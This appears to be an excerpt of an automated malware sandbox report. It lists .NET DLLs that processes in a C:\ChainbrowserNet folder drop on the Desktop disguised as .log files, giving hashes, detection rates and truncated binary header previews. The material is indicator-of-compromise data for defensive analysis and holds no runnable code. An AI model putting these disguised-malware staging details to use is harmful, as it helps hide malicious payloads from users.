                                                                                          • Filename: VqGD18ELBM.exe, Detection: malicious, Browse
                                                                                          • Filename: f3I38kv.exe, Detection: malicious, Browse
                                                                                          • Filename: r6cRyCpdfS.exe, Detection: malicious, Browse
                                                                                          • Filename: Z4D3XAZ2jB.exe, Detection: malicious, Browse
                                                                                          • Filename: cbCjTbodwa.exe, Detection: malicious, Browse
                                                                                          • Filename: vb8DOBZQ4X.exe, Detection: malicious, Browse
                                                                                          • Filename: 6G8OR42xrB.exe, Detection: malicious, Browse
                                                                                          • Filename: XNPOazHpXF.exe, Detection: malicious, Browse
                                                                                          • Filename: 9FwQYJSj4N.exe, Detection: malicious, Browse
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\FEoVfgpT.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):34304
                                                                                          Entropy (8bit):5.618776214605176
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                          MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                          SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                          SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                          SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 9%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\HBQeAgEO.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):64000
                                                                                          Entropy (8bit):5.857602289000348
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                          MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                          SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                          SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                          SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\HQmlqEFC.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):70144
                                                                                          Entropy (8bit):5.909536568846014
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                          MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                          SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                          SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                          SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\IkuUPlxR.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):33280
                                                                                          Entropy (8bit):5.634433516692816
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                          MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                          SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                          SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                          SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\JYydAytP.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):40448
                                                                                          Entropy (8bit):5.7028690200758465
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                          MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                          SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                          SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                          SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\LQcCJUsI.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):126976
                                                                                          Entropy (8bit):6.057993947082715
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                          MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                          SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                          SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                          SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                                          C:\Users\user\Desktop\LVZlWyIJ.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):34816
                                                                                          Entropy (8bit):5.636032516496583
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                          MD5:996BD447A16F0A20F238A611484AFE86
                                                                                          SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                          SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                          SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\LazCtHLF.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):40448
                                                                                          Entropy (8bit):5.7028690200758465
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                          MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                          SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                          SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                          SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\LxFcNPnz.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):33280
                                                                                          Entropy (8bit):5.634433516692816
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                          MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                          SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                          SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                          SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\NGFBdMTC.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):50176
                                                                                          Entropy (8bit):5.723168999026349
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                          MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                          SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                          SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                          SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\NYMTshMF.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):294912
                                                                                          Entropy (8bit):6.010605469502259
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                          MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                          SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                          SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                          SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                          C:\Users\user\Desktop\OQqtADLy.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):32256
                                                                                          Entropy (8bit):5.631194486392901
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\OqULzLYx.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):39936
                                                                                          Entropy (8bit):5.660491370279985
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                          MD5:240E98D38E0B679F055470167D247022
                                                                                          SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                          SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                          SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\THRskbyw.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):85504
                                                                                          Entropy (8bit):5.8769270258874755
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                          C:\Users\user\Desktop\UaZkrFKp.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):50176
                                                                                          Entropy (8bit):5.723168999026349
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                          MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                          SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                          SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                          SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\WBUJbbcm.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):23552
                                                                                          Entropy (8bit):5.519109060441589
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\WcMTNoOk.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):46592
                                                                                          Entropy (8bit):5.870612048031897
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\XpYRNoYk.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):34304
                                                                                          Entropy (8bit):5.618776214605176
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                          MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                          SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                          SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                          SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 9%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\YxtBDwFZ.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):23552
                                                                                          Entropy (8bit):5.519109060441589
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

